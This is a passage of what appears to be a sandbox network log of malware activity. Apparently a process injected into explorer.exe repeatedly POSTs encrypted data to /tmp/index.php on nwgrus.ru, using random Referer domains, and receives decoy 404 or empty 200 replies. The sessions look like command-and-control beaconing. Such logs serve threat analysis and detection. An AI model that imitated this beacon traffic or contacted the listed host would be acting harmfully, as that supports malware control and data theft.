                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 8, 2024 18:23:40.659202099 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 61327 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:40.985582113 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://gcsggiqiypjqctoh.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 166
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:40.985654116 CEST166OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 78 4f f9 9b
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuxOH_k]Bf`IAL-4YkA[w=J?N1=BRNT?sh
Oct 8, 2024 18:23:41.860126019 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:41 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 61334 | Destination IP: 160.177.223.165 | Destination Port: 80 | PID: 4004 | Process: C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:41.876885891 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://swrrssmuceopwlwv.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 194
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:41.876885891 CEST194OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 6c 4e df bd
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vulN]Jc8VEgt1[=S{WU4?7B?HH<:=pmDX4@C$3jEB
                                                                                                                          Oct 8, 2024 18:23:42.739319086 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:42 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 61340 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:42.748801947 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mcrofbggconl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 245
Host: nwgrus.ru
Oct 8, 2024 18:23:42.748814106 CEST | 245 | OUT | Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu; %]mp3hASkitFzI@i4R/Ys6&PG9F8V$iX'Y:f]-!qWn2}IoJQ
Oct 8, 2024 18:23:43.610102892 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:43 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 61347 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:43.620249033 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://euadhmjtligscip.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 287
Host: nwgrus.ru
Oct 8, 2024 18:23:43.620275021 CEST | 287 | OUT | Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu3IJKQXtPn+E_lbH4~B=S7=VRgE9OQ*jL#V`A+|DF8N7V~OR?Dn^a|lX
Oct 8, 2024 18:23:44.512805939 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 61355 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:44.520380020 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oratgvwctswjsrg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 289
Host: nwgrus.ru
Oct 8, 2024 18:23:44.520416021 CEST | 289 | OUT | Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu`s!Eab-?b`w;:K!#AN0MQ}Sx)NcmeYsHP($6vJEZnK%Z4'
Oct 8, 2024 18:23:45.414834023 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 61360 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:45.424655914 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jukynnhymwnwl.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 281
Host: nwgrus.ru
Oct 8, 2024 18:23:45.424655914 CEST | 281 | OUT | Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuT[_[G]i2/+~3oU<C70+X^]kP#G$#L'2]S)xC?!>`AoBEnGSxBm+(o
Oct 8, 2024 18:23:46.355251074 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:46 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 61365 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 18:23:46.366725922 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pithrelifcqallw.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: nwgrus.ru
Oct 8, 2024 18:23:46.366753101 CEST | 148 | OUT | Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vuTRdeh{^`YR6htE4pz^@hTKMih
Oct 8, 2024 18:23:47.251260996 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Tue, 08 Oct 2024 16:23:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.661370160.177.223.165804004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 8, 2024 18:23:47.260538101 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://kdahnseejtpvc.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 147
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:47.260550022 CEST147OUTData Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 31 08 e7 a8
                                                                                                                          Data Ascii: ;nRfkVp{yyisjuyCk*)ud+l?!0jHYcM@NA -[k,vu1BiScjP{Fyk<B\f|AK]9-.^x
                                                                                                                          Oct 8, 2024 18:23:48.813927889 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:48.814500093 CEST484INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                          Oct 8, 2024 18:23:48.818655014 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          19 | 192.168.2.6 | 61375 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:48.825911045 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://umfnnmmrmjakpw.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 314
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:48.825943947 CEST | 314 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 4d 00 a6 86
                                                                                                                          Oct 8, 2024 18:23:49.698420048 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:49 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          20 | 192.168.2.6 | 61382 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:49.709860086 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://hjaonoqsbnhieap.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 286
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:49.709860086 CEST | 286 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 5a 3c a8 e7
                                                                                                                          Oct 8, 2024 18:23:50.575336933 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:50 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          21 | 192.168.2.6 | 61388 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:50.584526062 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://kfntyderqkkh.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 258
                                                                                                                          Host: nwgrus.ru
                                                                                                                          Oct 8, 2024 18:23:50.584561110 CEST | 258 | OUT | Data Raw: 3b 6e 52 66 84 bc 6b 56 d6 a9 b2 01 03 70 7b bb 79 79 cd 90 69 73 e5 6a 0f 75 79 97 43 c7 c7 6b 92 2a c1 29 75 64 2b 6c ed 9d 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 2f 34 b5 f8
                                                                                                                          Oct 8, 2024 18:23:51.440485954 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.26.0
                                                                                                                          Date: Tue, 08 Oct 2024 16:23:51 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          22 | 192.168.2.6 | 61397 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 8, 2024 18:23:51.448854923 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bpuffphxcjr.net/
